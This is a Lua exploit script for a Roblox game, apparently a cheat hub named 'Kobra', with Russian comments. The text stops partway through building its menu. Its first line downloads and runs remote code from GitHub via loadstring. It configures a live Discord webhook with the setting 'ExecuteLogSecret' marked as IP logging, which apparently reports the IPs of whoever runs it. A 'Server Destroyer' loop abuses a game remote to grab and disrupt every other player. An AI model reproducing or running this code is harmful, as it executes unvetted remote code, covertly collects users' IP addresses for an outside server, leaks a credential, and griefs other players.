local ApiFTAP = loadstring(game:HttpGet("https://raw.githubusercontent.com/Oxwoey/FTAP-Module/refs/heads/main/Module/ModuleFTAP"))()

-- Проверка успешной загрузки ApiFTAP
if not ApiFTAP then
    warn("Failed to load ApiFTAP module.")
    -- Можете добавить здесь код для остановки выполнения скрипта или отображения ошибки пользователю
    return
end

ApiFTAP:SetSettings({
    NameHub = "Kobra",
    WebhookEnabled = true, -- Enable/Disable
    ExecuteLogSecret = true, -- IP logging
    WebhookLink = "https://discord.com/api/webhooks/1364446921791508480/QAEuLmPSu1addaZY1gI3ljXlV6fmSZq1gmhHmRN81nIjTIjKfzOJpBCXnOOA5SLaSBC5" -- Исправлена ссылка, если она была неверной
})

-- УДАЛЕНИЕ СТАРОГО МЕНЮ
local oldGui = game:GetService("CoreGui"):FindFirstChild("Kobra")
if oldGui then
    oldGui:Destroy()
end

-- СОЗДАНИЕ ГЛОБАЛЬНОЙ ПЕРЕМЕННОЙ ДЛЯ ОТСЛЕЖИВАНИЯ СОСТОЯНИЯ МЕНЮ
getgenv().KobraOpen = true

-- Переменные состояния для Server Destroyer (определены вне createMenu)
local isServerDestroyerEnabled = false
local isFriendsWhitelisted = true -- По умолчанию друзья в вайтлисте, чтобы не кикать их

-- UI для сообщений (определены вне createMenu)
local messageGui = Instance.new("ScreenGui")
messageGui.Name = "BlobmanMessageGui"
messageGui.ResetOnSpawn = false
messageGui.IgnoreGuiInset = true
messageGui.ZIndexBehavior = Enum.ZIndexBehavior.Global
messageGui.Parent = game:GetService("CoreGui")

local messageLabel = Instance.new("TextLabel")
messageLabel.Name = "MessageLabel"
messageLabel.Size = UDim2.new(0, 400, 0, 50)
messageLabel.Position = UDim2.new(0.5, -200, 0.9, -25) -- Внизу по центру
messageLabel.BackgroundTransparency = 0.8 -- Немного прозрачный фон
messageLabel.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
messageLabel.TextColor3 = Color3.new(1, 1, 1) -- Белый текст
messageLabel.TextSize = 18
messageLabel.Font = Enum.Font.GothamBold
messageLabel.TextWrapped = true
messageLabel.TextXAlignment = Enum.TextXAlignment.Center
messageLabel.TextYAlignment = Enum.TextYAlignment.Center
messageLabel.Visible = false
messageLabel.BorderSizePixel = 1
messageLabel.BorderColor3 = Color3.fromRGB(60, 60, 60)
messageLabel.ZIndex = 10 -- Убедимся, что поверх других UI
messageLabel.Parent = messageGui

-- Функция для отображения сообщения в UI (определена вне createMenu)
local function displayMessage(text, duration)
    messageLabel.Text = text
    messageLabel.Visible = true
    messageLabel.BackgroundTransparency = 1 -- Сброс прозрачности для нового сообщения

    -- Используем TweenService для плавного исчезновения
    local TweenService = game:GetService("TweenService")
    local tweenInfo = TweenInfo.new(
        duration, -- Длительность отображения
        Enum.EasingStyle.Linear,
        Enum.EasingDirection.Out,
        0, -- Количество повторов
        false, -- Реверс
        0 -- Задержка перед началом
    )

    local fadeTween = TweenService:Create(messageLabel, tweenInfo, {BackgroundTransparency = 1})
    fadeTween:Play()

    -- Скрываем метку после завершения твина
    fadeTween.Completed:Connect(function()
        messageLabel.Visible = false
    end)
end

--[[
  Функция "Уничтожитель сервера" с опцией вайтлиста друзей.
  Эта функция предназначена для притягивания всех игроков (кроме, возможно, друзей)
  к локальному игроку с использованием механизма Blobman.

  Эта версия интегрирована в меню и использует его переменные состояния.
  Используйте с осторожностью, так как отсутствие ожидаемых объектов или ошибки
  при вызове FireServer могут вызвать остановку скрипта.
--]]
local isServerDestroyerEnabled = false
local isFriendsWhitelisted = false

local function toggleServerDestroyer(enabled, whitelistFriends)
    isServerDestroyerEnabled = enabled
    isFriendsWhitelisted = whitelistFriends

    if isServerDestroyerEnabled then
        print("🧨 Server Destroyer Started. Whitelist Friends: " .. tostring(isFriendsWhitelisted))

        task.spawn(function()
            local localPlayer = game.Players.LocalPlayer
            if not localPlayer then
                warn("❌ Local player not found.")
                isServerDestroyerEnabled = false
                return
            end

            local playersAffectedCount = 0

            while isServerDestroyerEnabled do
                local allPlayers = {}
                for _, player in ipairs(game.Players:GetPlayers()) do
                    if player ~= localPlayer and player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
                        if not (isFriendsWhitelisted and localPlayer:IsFriendsWith(player.UserId)) then
                            table.insert(allPlayers, player)
                        end
                    end
                end

                -- Разделим на 2 группы
                local mid = math.ceil(#allPlayers / 2)
                local groupLeft = {}
                local groupRight = {}

                for i, p in ipairs(allPlayers) do
                    if i <= mid then
                        table.insert(groupLeft, p)
                    else
                        table.insert(groupRight, p)
                    end
                end

                -- Собираем всех Blobman'ов
                local blobmans = {}
                for _, folder in ipairs(workspace:GetChildren()) do
                    if folder:IsA("Folder") and folder.Name:find("SpawnedInToys") then
                        for _, blob in ipairs(folder:GetChildren()) do
                            if blob:IsA("Model") and blob.Name == "CreatureBlobman" then
                                local root = blob:FindFirstChild("HumanoidRootPart")
                                if root then
                                    local seatScript = blob:FindFirstChild("BlobmanSeatAndOwnerScript")
                                    if seatScript then
                                        table.insert(blobmans, {
                                            model = blob,
                                            root = root,
                                            left = blob:FindFirstChild("LeftDetector"),
                                            right = blob:FindFirstChild("RightDetector"),
                                            leftWeld = blob:FindFirstChild("LeftDetector") and blob.LeftDetector:FindFirstChild("LeftWeld"),
                                            rightWeld = blob:FindFirstChild("RightDetector") and blob.RightDetector:FindFirstChild("RightWeld"),
                                            remote = seatScript:FindFirstChild("CreatureGrab")
                                        })
                                    end
                                end
                            end
                        end
                    end
                end

                -- Вспомогательная функция
                local function getClosestBlobman(targetPos, hand)
                    local closest, minDist = nil, math.huge
                    for _, blob in ipairs(blobmans) do
                        local weld = hand == "Left" and blob.leftWeld or blob.rightWeld
                        local detector = hand == "Left" and blob.left or blob.right
                        if blob.remote and detector and weld then
                            local dist = (blob.root.Position - targetPos).Magnitude
                            if dist < minDist then
                                closest = {remote = blob.remote, detector = detector, weld = weld}
                                minDist = dist
                            end
                        end
                    end
                    return closest
                end

                -- Граб левой рукой
                for _, player in ipairs(groupLeft) do
                    local root = player.Character:FindFirstChild("HumanoidRootPart")
                    if root then
                        local blob = getClosestBlobman(root.Position, "Left")
                        if blob then
                            local args = {blob.detector, root, blob.weld}
                            pcall(function()
                                blob.remote:FireServer(unpack(args))
                                playersAffectedCount += 1
                            end)
                            task.wait(0.05)
                        end
                    end
                end

                -- Граб правой рукой
                for _, player in ipairs(groupRight) do
                    local root = player.Character:FindFirstChild("HumanoidRootPart")
                    if root then
                        local blob = getClosestBlobman(root.Position, "Right")
                        if blob then
                            local args = {blob.detector, root, blob.weld}
                            pcall(function()
                                blob.remote:FireServer(unpack(args))
                                playersAffectedCount += 1
                            end)
                            task.wait(0.05)
                        end
                    end
                end

                task.wait(0.3)
            end

            print("🛑 Server Destroyer Stopped. Players affected: " .. playersAffectedCount)
        end)
    else
        print("🔕 Server Destroyer Stopping...")
    end
end

-- ФУНКЦИЯ ДЛЯ СОЗДАНИЯ МЕНЮ (основная часть)
local function createMenu()
    -- СОЗДАНИЕ ОСНОВНОГО МЕНЮ (остальной код меню)
    local ScreenGui = Instance.new("ScreenGui")
    ScreenGui.Name = "Kobra"
    ScreenGui.ResetOnSpawn = false
    ScreenGui.IgnoreGuiInset = true
    ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Global
    ScreenGui.Parent = game:GetService("CoreGui")
    ScreenGui.Enabled = true -- Теперь меню открывается автоматически

    -- ГЛАВНАЯ РАМКА
    local MainFrame = Instance.new("Frame")
    MainFrame.Name = "MainFrame"
    MainFrame.Size = UDim2.new(0, 600, 0, 450)
    MainFrame.Position = UDim2.new(0.5, -300, 0.5, -225)
    MainFrame.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
    MainFrame.BorderSizePixel = 0
    MainFrame.Active = true
    MainFrame.Draggable = true
    MainFrame.Parent = ScreenGui

    -- Добавляем скругленные углы к MainFrame
    local UICorner = Instance.new("UICorner")
    UICorner.CornerRadius = UDim.new(0, 8) -- Радиус скругления
    UICorner.Parent = MainFrame

    -- ЗАГОЛОВОК
    local TitleBar = Instance.new("Frame")
    TitleBar.Name = "TitleBar"
    TitleBar.Size = UDim2.new(1, 0, 0, 50)
    TitleBar.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
    TitleBar.BorderSizePixel = 0
    TitleBar.Parent = MainFrame

    -- Добавляем скругленные углы к TitleBar (только нижние)
    local TitleBarCorner = Instance.new("UICorner")
    TitleBarCorner.CornerRadius = UDim.new(0, 8)
    TitleBarCorner.Parent = TitleBar
    -- Чтобы скруглить только нижние углы, можно использовать UIGradient или Frame поверх,
    -- но для простоты оставим скругление всех углов или только верхних/нижних
    -- Если нужно только нижние, потребуется дополнительная настройка или другой элемент.
    -- Оставим скругление всех углов для простоты, это выглядит аккуратно.


    local TitleText = Instance.new("TextLabel")
    TitleText.Name = "TitleText"
    TitleText.Size = UDim2.new(1, -20, 1, 0)
    TitleText.Position = UDim2.new(0, 10, 0, 0)
    TitleText.BackgroundTransparency = 1
    TitleText.Text = "Kobra"
    TitleText.TextColor3 = Color3.new(1, 1, 1)
    TitleText.TextSize = 24
    TitleText.Font = Enum.Font.GothamBold
    TitleText.TextXAlignment = Enum.TextXAlignment.Left
    TitleText.Parent = TitleBar

    -- ВКЛАДКИ
local Tabs = Instance.new("ScrollingFrame") -- <-- ВАЖНО: теперь это ScrollingFrame!
Tabs.Name = "Tabs"
Tabs.Size = UDim2.new(0, 150, 1, -50)
Tabs.Position = UDim2.new(0, 0, 0, 50)
Tabs.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
Tabs.BorderSizePixel = 0
Tabs.ScrollBarThickness = 6 -- Толщина полосы прокрутки
Tabs.CanvasSize = UDim2.new(0, 0, 0, 0) -- Будет обновляться автоматически
Tabs.AutomaticCanvasSize = Enum.AutomaticSize.Y -- Авто-увеличение CanvasSize по списку
Tabs.ScrollingDirection = Enum.ScrollingDirection.Y -- Только вертикально
Tabs.Parent = MainFrame

    -- Добавляем скругленные углы к Tabs (только нижние)
     local TabsCorner = Instance.new("UICorner")
    TabsCorner.CornerRadius = UDim.new(0, 8)
    TabsCorner.Parent = Tabs
    -- Как и для TitleBar, для скругления только нижних углов потребуется дополнительная настройка.
    -- Оставим скругление всех углов Tabs для простоты.


    -- СОДЕРЖИМОЕ
    local Content = Instance.new("Frame")
    Content.Name = "Content"
    Content.Size = UDim2.new(1, -150, 1, -50)
    Content.Position = UDim2.new(0, 150, 0, 50)
    Content.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
    Content.BorderSizePixel = 0
    Content.Parent = MainFrame

     -- Добавляем скругленные углы к Content (только нижние и правые)
    local ContentCorner = Instance.new("UICorner")
    ContentCorner.CornerRadius = UDim.new(0, 8)
    ContentCorner.Parent = Content
    -- Для скругления только нижних и правых углов потребуется дополнительная настройка.
    -- Оставим скругление всех углов Content для простоты.


    -- СПИСОК ДЛЯ КНОПОК ВКЛАДОК
    local TabList = Instance.new("UIListLayout")
    TabList.Name = "TabList"
    TabList.Padding = UDim.new(0, 2)  -- Отступ между кнопками
    TabList.FillDirection = Enum.FillDirection.Vertical
    TabList.SortOrder = Enum.SortOrder.LayoutOrder
    TabList.Parent = Tabs

    -- Хранение активных функций (переменные состояния Server Destroyer теперь вне этой функции)
    local ActiveFunctions = {}
    local ActiveKeybinds = {}
    local SelectedBlobmanPlayer = nil -- Хранение выбранного игрока для Blobman


    -- ФУНКЦИЯ СОЗДАНИЯ ВКЛАДКИ (осталась на месте)
    local function createTab(name, order)
        local tabBtn = Instance.new("TextButton")
        tabBtn.Size = UDim2.new(1, 0, 0, 50)
        tabBtn.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
        tabBtn.Text = name
        tabBtn.TextColor3 = Color3.new(1, 1, 1)
        tabBtn.TextSize = 18  -- Конкретный размер шрифта вместо масштабирования
        tabBtn.Font = Enum.Font.GothamBold
        tabBtn.LayoutOrder = order
        tabBtn.Parent = Tabs

        -- Добавляем скругленные углы к кнопкам вкладок
        local ButtonCorner = Instance.new("UICorner")
        ButtonCorner.CornerRadius = UDim.new(0, 6)
        ButtonCorner.Parent = tabBtn


        local tabContent = Instance.new("ScrollingFrame")
        tabContent.Name = name .. "Tab"
        tabContent.Size = UDim2.new(1, -20, 1, -20)
        tabContent.Position = UDim2.new(0, 10, 0, 10)
        tabContent.BackgroundTransparency = 1
        tabContent.Visible = false
        tabContent.ScrollBarThickness = 6
        tabContent.BorderSizePixel = 0
        tabContent.CanvasSize = UDim2.new(0, 0, 0, 0)
        tabContent.AutomaticCanvasSize = Enum.AutomaticSize.Y
        tabContent.Parent = Content

        -- UIListLayout для элементов внутри вкладки
        local contentList = Instance.new("UIListLayout")
        contentList.Name = "ContentList"
        contentList.Padding = UDim.new(0, 10)
        contentList.FillDirection = Enum.FillDirection.Vertical
        contentList.SortOrder = Enum.SortOrder.LayoutOrder
        contentList.Parent = tabContent

        -- Автоматическое изменение размера контента
        local contentPadding = Instance.new("UIPadding")
        contentPadding.PaddingTop = UDim.new(0, 5)
        contentPadding.PaddingLeft = UDim.new(0, 5)
        contentPadding.PaddingRight = UDim.new(0, 5)
        contentPadding.PaddingBottom = UDim.new(0, 5)
        contentPadding.Parent = tabContent

        local paddingFrame = Instance.new("Frame")
paddingFrame.Size = UDim2.new(1, 0, 0, 100) -- 40 пикселей снизу
paddingFrame.BackgroundTransparency = 1
paddingFrame.BorderSizePixel = 0
paddingFrame.LayoutOrder = 9999 -- чтобы был в конце
paddingFrame.Parent = tabContent


        tabBtn.MouseButton1Click:Connect(function()
            -- Сброс цвета всех вкладок
            for _, btn in pairs(Tabs:GetChildren()) do
                if btn:IsA("TextButton") then
                    btn.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
                end
            end

            -- Выделение активной вкладки
            tabBtn.BackgroundColor3 = Color3.fromRGB(80, 80, 80)

            -- Скрыть все вкладки
            for _, v in pairs(Content:GetChildren()) do
                if v:IsA("ScrollingFrame") then
                    v.Visible = false
                end
            end
            -- Отобразить текущую вкладку
            tabContent.Visible = true
        end)
        return tabContent
    end

    -- Функция создания переключателя (осталась на месте)
    local function createToggle(parent, text, layoutOrder, callback)
        local toggleFrame = Instance.new("Frame")
        toggleFrame.Size = UDim2.new(1, 0, 0, 40)
        toggleFrame.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
        toggleFrame.BorderSizePixel = 0
        toggleFrame.LayoutOrder = layoutOrder
        toggleFrame.Parent = parent

        -- Добавляем скругленные углы к рамке переключателя
        local FrameCorner = Instance.new("UICorner")
        FrameCorner.CornerRadius = UDim.new(0, 6)
        FrameCorner.Parent = toggleFrame

        local toggleLabel = Instance.new("TextLabel")
        toggleLabel.Size = UDim2.new(0.7, 0, 1, 0)
        toggleLabel.Position = UDim2.new(0, 10, 0, 0)
        toggleLabel.BackgroundTransparency = 1
        toggleLabel.Text = text
        toggleLabel.TextColor3 = Color3.new(1, 1, 1)
        toggleLabel.TextSize = 16
        toggleLabel.Font = Enum.Font.Gotham
        toggleLabel.TextXAlignment = Enum.TextXAlignment.Left
        toggleLabel.Parent = toggleFrame

        local toggleButton = Instance.new("TextButton")
        toggleButton.Size = UDim2.new(0, 60, 0, 30)
        toggleButton.Position = UDim2.new(1, -70, 0.5, -15)
        toggleButton.BackgroundColor3 = Color3.fromRGB(200, 60, 60)
        toggleButton.Text = "OFF"
        toggleButton.TextColor3 = Color3.new(1, 1, 1)
        toggleButton.TextSize = 14
        toggleButton.Font = Enum.Font.GothamBold
        toggleButton.BorderSizePixel = 0
        toggleButton.Parent = toggleFrame

         -- Добавляем скругленные углы к кнопке переключателя
        local ButtonCorner = Instance.new("UICorner")
        ButtonCorner.CornerRadius = UDim.new(0, 6)
        ButtonCorner.Parent = toggleButton


        local isToggled = false

        toggleButton.MouseButton1Click:Connect(function()
            isToggled = not isToggled

            if isToggled then
                toggleButton.BackgroundColor3 = Color3.fromRGB(60, 200, 60)
                toggleButton.Text = "ON"
                callback(true)
            else
                toggleButton.BackgroundColor3 = Color3.fromRGB(200, 60, 60)
                toggleButton.Text = "OFF"
                callback(false)
            end
        end)

        return toggleButton
    end

    -- Функция создания слайдера (осталась на месте)
    local function createSlider(parent, text, min, max, default, layoutOrder, callback)
        local sliderFrame = Instance.new("Frame")
        sliderFrame.Size = UDim2.new(1, 0, 0, 60)
        sliderFrame.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
        sliderFrame.BorderSizePixel = 0
        sliderFrame.LayoutOrder = layoutOrder
        sliderFrame.Parent = parent

         -- Добавляем скругленные углы к рамке слайдера
        local FrameCorner = Instance.new("UICorner")
        FrameCorner.CornerRadius = UDim.new(0, 6)
        FrameCorner.Parent = sliderFrame


        local sliderLabel = Instance.new("TextLabel")
        sliderLabel.Size = UDim2.new(1, -20, 0, 20)
        sliderLabel.Position = UDim2.new(0, 10, 0, 5)
        sliderLabel.BackgroundTransparency = 1
        sliderLabel.Text = text .. ": " .. default
        sliderLabel.TextColor3 = Color3.new(1, 1, 1)
        sliderLabel.TextSize = 16
        sliderLabel.Font = Enum.Font.Gotham
        sliderLabel.TextXAlignment = Enum.TextXAlignment.Left
        sliderLabel.Name = "SliderLabel"
        sliderLabel.Parent = sliderFrame

        local sliderBackground = Instance.new("Frame")
        sliderBackground.Size = UDim2.new(1, -20, 0, 10)
        sliderBackground.Position = UDim2.new(0, 10, 0, 30)
        sliderBackground.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
        sliderBackground.BorderSizePixel = 0
        sliderBackground.Name = "SliderBackground"
        sliderBackground.Parent = sliderFrame

         -- Добавляем скругленные углы к фону слайдера
        local BackgroundCorner = Instance.new("UICorner")
        BackgroundCorner.CornerRadius = UDim.new(0, 5)
        BackgroundCorner.Parent = sliderBackground


        local sliderFill = Instance.new("Frame")
        sliderFill.Size = UDim2.new((default - min) / (max - min), 0, 1, 0)
        sliderFill.BackgroundColor3 = Color3.fromRGB(60, 120, 200)
        sliderFill.BorderSizePixel = 0
        sliderFill.Name = "SliderFill"
        sliderFill.Parent = sliderBackground

         -- Добавляем скругленные углы к заполнению слайдера
        local FillCorner = Instance.new("UICorner")
        FillCorner.CornerRadius = UDim.new(0, 5)
        FillCorner.Parent = sliderFill


        local sliderButton = Instance.new("TextButton")
        sliderButton.Size = UDim2.new(0, 20, 0, 20)
        sliderButton.Position = UDim2.new((default - min) / (max - min), -10, 0, -5)
        sliderButton.BackgroundColor3 = Color3.fromRGB(200, 200, 200)
        sliderButton.Text = ""
        sliderButton.BorderSizePixel = 0
        sliderButton.Name = "SliderButton"
        sliderButton.Parent = sliderBackground

         -- Добавляем скругленные углы к кнопке слайдера
        local ButtonCorner = Instance.new("UICorner")
        ButtonCorner.CornerRadius = UDim.new(0, 10)
        ButtonCorner.Parent = sliderButton


        local currentValue = default

        -- Функция для обновления слайдера
        local function updateSlider(value)
            value = math.clamp(value, min, max)
            value = math.floor(value * 10 + 0.5) / 10 -- Округление до 1 знака после запятой

            local position = (value - min) / (max - min)
            sliderFill.Size = UDim2.new(position, 0, 1, 0)
            sliderButton.Position = UDim2.new(position, -10, 0, -5)
            sliderLabel.Text = text .. ": " .. value
            currentValue = value

            callback(value)
        end

        -- Обработка перетаскивания кнопки слайдера
        local dragging = false

        sliderButton.MouseButton1Down:Connect(function()
            dragging = true
        end)

        game:GetService("UserInputService").InputEnded:Connect(function(input)
            if input.UserInputType == Enum.UserInputType.MouseButton1 then
                dragging = false
            end
        end)

        game:GetService("UserInputService").InputChanged:Connect(function(input)
            if dragging and input.UserInputType == Enum.UserInputType.MouseMovement then
                local mousePosition = game:GetService("UserInputService"):GetMouseLocation()
                local sliderPosition = sliderBackground.AbsolutePosition
                local sliderSize = sliderBackground.AbsoluteSize

                local relativeX = math.clamp((mousePosition.X - sliderPosition.X) / sliderSize.X, 0, 1)
                local value = min + (max - min) * relativeX

                updateSlider(value)
            end
        end)

        -- Также разрешаем клик по фону слайдера
        sliderBackground.InputBegan:Connect(function(input)
            if input.UserInputType == Enum.UserInputType.MouseButton1 then
                local mousePosition = game:GetService("UserInputService"):GetMouseLocation()
                local sliderPosition = sliderBackground.AbsolutePosition
                local sliderSize = sliderBackground.AbsoluteSize

                local relativeX = math.clamp((mousePosition.X - sliderPosition.X) / sliderSize.X, 0, 1)
                local value = min + (max - min) * relativeX

                updateSlider(value)
                dragging = true
            end
        end)

        -- Возвращаем объект слайдера и его текущее значение
        return {
            frame = sliderFrame,
            getValue = function() return currentValue end,
            setValue = function(value) updateSlider(value) end
        }
    end

    -- Функция создания информации о клавише (осталась на месте)
    local function createKeybindInfo(parent, text, key, layoutOrder)
        local keybindFrame = Instance.new("Frame")
        keybindFrame.Size = UDim2.new(1, 0, 0, 40)
        keybindFrame.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
        keybindFrame.BorderSizePixel = 0
        keybindFrame.LayoutOrder = layoutOrder
        keybindFrame.Parent = parent

         -- Добавляем скругленные углы к рамке информации о клавише
        local FrameCorner = Instance.new("UICorner")
        FrameCorner.CornerRadius = UDim.new(0, 6)
        FrameCorner.Parent = keybindFrame


        local keybindLabel = Instance.new("TextLabel")
        keybindLabel.Size = UDim2.new(0.7, 0, 1, 0)
        keybindLabel.Position = UDim2.new(0, 10, 0, 0)
        keybindLabel.BackgroundTransparency = 1
        keybindLabel.Text = text
        keybindLabel.TextColor3 = Color3.new(1, 1, 1)
        keybindLabel.TextSize = 16
        keybindLabel.Font = Enum.Font.Gotham
        keybindLabel.TextXAlignment = Enum.TextXAlignment.Left
        keybindLabel.Parent = keybindFrame

        local keyLabel = Instance.new("TextLabel")
        keyLabel.Size = UDim2.new(0, 60, 0, 30)
        keyLabel.Position = UDim2.new(1, -70, 0.5, -15)
        keyLabel.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
        keyLabel.Text = key
        keyLabel.TextColor3 = Color3.new(1, 1, 1)
        keyLabel.TextSize = 14
        keyLabel.Font = Enum.Font.GothamBold
        keyLabel.BorderSizePixel = 0
        keyLabel.Parent = keybindFrame

         -- Добавляем скругленные углы к метке клавиши
        local KeyLabelCorner = Instance.new("UICorner")
        KeyLabelCorner.CornerRadius = UDim.new(0, 6)
        KeyLabelCorner.Parent = keyLabel


        return keybindFrame
    end

    -- Функция создания метки (TextLabel) (осталась на месте)
    local function createLabel(parent, text, layoutOrder)
        local label = Instance.new("TextLabel")
        label.Size = UDim2.new(1, 0, 0, 20)
        label.BackgroundTransparency = 1
        label.Text = text
        label.TextColor3 = Color3.new(1, 1, 1)
        label.TextSize = 16
        label.Font = Enum.Font.Gotham
        label.TextXAlignment = Enum.TextXAlignment.Left
        label.LayoutOrder = layoutOrder
        label.Parent = parent
        return label
    end

    -- Функция создания текстового поля (TextBox) (осталась на месте)
    local function createTextBox(parent, placeholder, layoutOrder)
        local textBoxFrame = Instance.new("Frame")
        textBoxFrame.Size = UDim2.new(1, 0, 0, 30)
        textBoxFrame.BackgroundColor3 = Color3.fromRGB(70, 70, 70)
        textBoxFrame.BorderSizePixel = 1
        textBoxFrame.BorderColor3 = Color3.fromRGB(50, 50, 50)
        textBoxFrame.LayoutOrder = layoutOrder
        textBoxFrame.Parent = parent

         -- Добавляем скругленные углы к рамке текстового поля
        local FrameCorner = Instance.new("UICorner")
        FrameCorner.CornerRadius = UDim.new(0, 6)
        FrameCorner.Parent = textBoxFrame


        local textBox = Instance.new("TextBox")
        textBox.Size = UDim2.new(1, -10, 1, -10)
        textBox.Position = UDim2.new(0, 5, 0, 5)
        textBox.BackgroundTransparency = 1
        textBox.PlaceholderText = placeholder
        textBox.Text = ""
        textBox.TextColor3 = Color3.new(1, 1, 1)
        textBox.PlaceholderColor3 = Color3.fromRGB(150, 150, 150)
        textBox.TextSize = 16
        textBox.Font = Enum.Font.Gotham
        textBox.ClearTextOnFocus = false
        textBox.Parent = textBoxFrame

        return textBox
    end

    -- Функция создания кнопки (осталась на месте)
    local function createButton(parent, text, layoutOrder, callback)
        local button = Instance.new("TextButton")
        button.Size = UDim2.new(1, 0, 0, 40)
        button.BackgroundColor3 = Color3.fromRGB(60, 120, 200)
        button.Text = text
        button.TextColor3 = Color3.new(1, 1, 1)
        button.TextSize = 18
        button.Font = Enum.Font.GothamBold
        button.BorderSizePixel = 0
        button.LayoutOrder = layoutOrder
        button.Parent = parent

         -- Добавляем скругленные углы к кнопке
        local ButtonCorner = Instance.new("UICorner")
        ButtonCorner.CornerRadius = UDim.new(0, 6)
        ButtonCorner.Parent = button


        button.MouseButton1Click:Connect(callback)

        return button
    end

    -- Функция создания выпадающего списка игроков (осталась на месте)
    local function createPlayerDropdown(parent, layoutOrder)
        local dropdownFrame = Instance.new("Frame")
        dropdownFrame.Size = UDim2.new(1, 0, 0, 40)
        dropdownFrame.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
        dropdownFrame.BorderSizePixel = 0
        dropdownFrame.LayoutOrder = layoutOrder
        dropdownFrame.Parent = parent
        dropdownFrame.ClipsDescendants = false

         -- Добавляем скругленные углы к рамке выпадающего списка
        local FrameCorner = Instance.new("UICorner")
        FrameCorner.CornerRadius = UDim.new(0, 6)
        FrameCorner.Parent = dropdownFrame


        local dropdownButton = Instance.new("TextButton")
        dropdownButton.Size = UDim2.new(1, 0, 1, 0)
        dropdownButton.BackgroundColor3 = Color3.fromRGB(70, 70, 70)
        dropdownButton.Text = "Select Player"
        dropdownButton.TextColor3 = Color3.new(1, 1, 1) -- Чисто белый цвет для текста
        dropdownButton.TextSize = 16
        dropdownButton.Font = Enum.Font.Gotham
        dropdownButton.TextXAlignment = Enum.TextXAlignment.Left
        dropdownButton.TextYAlignment = Enum.TextYAlignment.Center -- Выравнивание по центру по вертикали
        dropdownButton.BorderSizePixel = 0
        dropdownButton.Parent = dropdownFrame

         -- Добавляем скругленные углы к кнопке выпадающего списка
        local ButtonCorner = Instance.new("UICorner")
        ButtonCorner.CornerRadius = UDim.new(0, 6)
        ButtonCorner.Parent = dropdownButton


        local dropdownList = Instance.new("ScrollingFrame")
        dropdownList.Size = UDim2.new(1, 0, 0, 150) -- Высота списка
        dropdownList.Position = UDim2.new(0, 0, 1, 0)
        dropdownList.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
        dropdownList.BorderSizePixel = 1
        dropdownList.BorderColor3 = Color3.fromRGB(40, 40, 40)
        dropdownList.Visible = false
        dropdownList.ZIndex = 2 -- Чтобы список был поверх других элементов
        dropdownList.Parent = dropdownFrame

         -- Добавляем скругленные углы к списку выпадающего списка
        local ListCorner = Instance.new("UICorner")
        ListCorner.CornerRadius = UDim.new(0, 6)
        ListCorner.Parent = dropdownList


        local listLayout = Instance.new("UIListLayout")
        listLayout.FillDirection = Enum.FillDirection.Vertical
        listLayout.SortOrder = Enum.SortOrder.LayoutOrder
        listLayout.Padding = UDim.new(0, 2) -- Добавляем небольшой отступ между кнопками
        listLayout.Parent = dropdownList

        local selectedPlayerName = nil

        -- Функция для обновления списка игроков
        local function updatePlayerList()
            print("Updating player list...")
            -- Очистить текущий список
            for _, child in pairs(dropdownList:GetChildren()) do
                if child:IsA("TextButton") then
                    child:Destroy()
                end
            end

            local players = game.Players:GetPlayers()
            print("Found " .. #players .. " players.")
            local layoutOrder = 2
            local buttonHeight = 35 -- Увеличиваем высоту кнопки
            local padding = listLayout.Padding.Offset

            for _, player in pairs(players) do
                -- Пропускаем локального игрока
                if player ~= game.Players.LocalPlayer then
                    print("Adding player: " .. player.Name)
                    local playerButton = Instance.new("TextButton")
                    playerButton.Size = UDim2.new(1, 0, 0, buttonHeight) -- Используем новую высоту
                    playerButton.BackgroundColor3 = Color3.fromRGB(70, 70, 70) -- Немного светлее фон
                    playerButton.Text = player.Name
                    playerButton.TextColor3 = Color3.new(1, 1, 1) -- Чисто белый цвет для текста
                    playerButton.TextSize = 16
                    playerButton.Font = Enum.Font.Gotham
                    playerButton.TextXAlignment = Enum.TextXAlignment.Left
                    playerButton.TextYAlignment = Enum.TextYAlignment.Center -- Выравнивание по центру по вертикали
                    playerButton.BorderSizePixel = 1 -- Добавляем границу
                    playerButton.BorderColor3 = Color3.fromRGB(50, 50, 50) -- Цвет границы
                    playerButton.LayoutOrder = layoutOrder
                    playerButton.Parent = dropdownList
                    playerButton.ZIndex = 2
                    playerButton.TextScaled = false -- Отключаем масштабирование текста

                     -- Добавляем скругленные углы к кнопке игрока в списке
                    local PlayerButtonCorner = Instance.new("UICorner")
                    PlayerButtonCorner.CornerRadius = UDim.new(0, 6)
                    PlayerButtonCorner.Parent = playerButton


                    playerButton.MouseButton1Click:Connect(function()
                        selectedPlayerName = player.Name
                        dropdownButton.Text = "Selected: " .. player.Name
                        dropdownList.Visible = false -- Скрыть список после выбора
                    end)

                    layoutOrder = layoutOrder + 1
                end
            end
            -- Обновляем CanvasSize для прокрутки
            -- Убедимся, что CanvasSize достаточно большой для всех элементов
            -- Учитываем отступы между элементами
            local totalHeight = (layoutOrder - 1) * (buttonHeight + padding)
            dropdownList.CanvasSize = UDim2.new(0, 0, 0, math.max(0, totalHeight))
             print("Player list updated. CanvasSize: " .. tostring(dropdownList.CanvasSize))
        end

        -- Обновляем список при открытии выпадающего списка
        dropdownButton.MouseButton1Click:Connect(function()
            dropdownList.Visible = not dropdownList.Visible
            if dropdownList.Visible then
                updatePlayerList()
            end
        end)

        -- Обновляем список при добавлении/удалении игроков
        game.Players.PlayerAdded:Connect(updatePlayerList)
        game.Players.PlayerRemoving:Connect(updatePlayerList)

        -- Изначально заполняем список
        updatePlayerList()

        return {
            frame = dropdownFrame,
            getSelectedPlayer = function() return selectedPlayerName end
        }
    end


    -- СОЗДАНИЕ ВКЛАДОК
    local mainTab = createTab("Main", 1)
    local combatTab = createTab("Combat", 2)
    local defenceTab = createTab("Defence", 3)
